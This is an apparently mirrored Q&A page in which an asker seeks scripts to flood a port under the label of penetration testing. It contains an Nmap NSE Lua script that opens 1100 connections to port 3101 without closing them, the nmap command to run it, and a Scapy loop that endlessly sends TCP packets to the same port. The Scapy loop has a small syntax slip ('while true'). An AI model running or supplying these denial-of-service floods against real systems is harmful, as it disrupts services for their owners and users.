DOS (nmap) Scripts (Penetration Testing) [closed]
-
25-06-2021 - |
Domanda
I need to preform a penetration test. I would like to get a script or some scripts together to attack and (hopefully not) bring down a certain port/software by flooding it. I have NMAP installed and an example script from colleague, couldnt anybody explain the script to me and shine any light on how to adjust it to fit my needs?
description = [[
Connects to ports without disconnecting
]]
author =""
license = 'Same as Nmap--See http://nmap.org/book/man-legal.html'
categories = {'auth', 'intrusive'}
require('shortport')
require('stdnse')
require('strbuf')
require('math')
local soc
local catch = function() soc:close() end
local try = nmap.new_try(catch)
--portrule = shortport.port_or_service({3000, 3001, 3002, 3003, 3004, 3005,3006,3007,3008,3009, 3010, 3011, 4008, 3110}, 'client server')
--portrule = shortport.port_or_service({3000-4008}, 'client server')
portrule = shortport.port_or_service({3101}, 'client server')
action = function(host, port)
math.randomseed( os.time() )
local buff = ""
soc = nmap.new_socket()
soc:set_timeout(400000000)
for j = 1,1100 do
print(j)
try(soc:connect(host.ip, port.number, port.protocol))
--soc:close()
end
--print(math.random(255))
return ""
end
Soluzione
I'm not sure that this script is the best way to do things, but in order to run it, you should use this command:
nmap -p 3101 --script your-script-name target
You'll probably have better luck using a different tool than Nmap. For instance you could use Scapy:
$ sudo scapy
>>> p = IP(dst="192.168.1.X") / TCP(dport=3101)
>>> while true:
... p.sport = random.randint(1024,65535)
... send(p)
Altri suggerimenti
http://nmap.org/book/nse-api.html
try setting function(host='host url here', port='port number here')
Autorizzato sotto: CC-BY-SA insieme a attribuzione
Non affiliato a StackOverflow